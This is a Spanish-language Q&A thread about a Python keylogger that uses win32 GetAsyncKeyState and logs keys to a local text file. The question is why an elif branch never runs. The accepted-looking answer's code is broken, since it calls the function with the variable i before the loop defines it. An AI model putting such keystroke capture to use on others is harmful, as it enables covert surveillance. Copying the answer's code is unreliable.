# Python: Si no se cumple el if no entra en el elif

Tags: python

estoy hace rato intentando entender porque al no cumplirse la condicion para que ingrese en el if no entra al elif y la verdad es que no entiendo porque pasa,  adjunto aqui mi codigo:

```
def KeyPressed(self):
        while True:
            for i in range(0x30,0x5B):              
                if win.GetAsyncKeyState(i) & 1 != 0 and win.GetAsyncKeyState(0xA0) & 1 != 0:
                    with open ("C:/Users/admin/Desktop/Keylogger/Keylogger.txt","a") as self.ArchivoTexto:
                        self.ArchivoTexto.write(str("%c"% i))               
                elif win.GetAsyncKeyState(i) & 1 != 0: 
                    with open ("C:/Users/admin/Desktop/Keylogger/Keylogger.txt","a") as self.ArchivoTexto:
                        self.ArchivoTexto.write(str("%c"% i).lower())
            if win.GetAsyncKeyState(0x20) & 1 != 0:                                     
                with open ("C:/Users/admin/Desktop/Keylogger/Keylogger.txt","a") as self.ArchivoTexto:
                        self.ArchivoTexto.write(str("%c" % 0x20))
            elif win.GetAsyncKeyState(0x1B) & 1 != 0:
                sys.exit()
```

El if y elif correspondientes son los que estan dentro del bucle for.

Comment: Son elif con condiciones diferentes. Perdón por preguntar lo obvio pero, ¿estás seguro que la condición del elif se cumple?

Comment: Si, cuando el primer if no estaba se cumplia .

Comment: El problema principal es que `win.GetAsyncKeyState` solo mira al estado desde la última vez que esta función se llamó. Llamarla todo el tiempo en un bucle `for` no puede funcionar bien. Vea https://stackoverflow.com/questions/5592500/detecting-key-presses-using-win32api-in-python

Answer (score -1):

Basado en el comentario de [JohanC](https://es.stackoverflow.com/users/149571/johanc) el codigo pudiera quedar asi, de modo que llamarias a la funcion *GetAsyncKeyState(i)* solo una vez:

```
def KeyPressed(self):
        while True:
            state = win.GetAsyncKeyState(i)
            for i in range(0x30,0x5B):              
                if state & 1 != 0 and win.GetAsyncKeyState(0xA0) & 1 != 0:
                    with open ("C:/Users/admin/Desktop/Keylogger/Keylogger.txt","a") as self.ArchivoTexto:
                        self.ArchivoTexto.write(str("%c"% i))               
                elif state & 1 != 0: 
                    with open ("C:/Users/admin/Desktop/Keylogger/Keylogger.txt","a") as self.ArchivoTexto:
                        self.ArchivoTexto.write(str("%c"% i).lower())
            if win.GetAsyncKeyState(0x20) & 1 != 0:                                     
                with open ("C:/Users/admin/Desktop/Keylogger/Keylogger.txt","a") as self.ArchivoTexto:
                        self.ArchivoTexto.write(str("%c" % 0x20))
            elif win.GetAsyncKeyState(0x1B) & 1 != 0:
                sys.exit()
```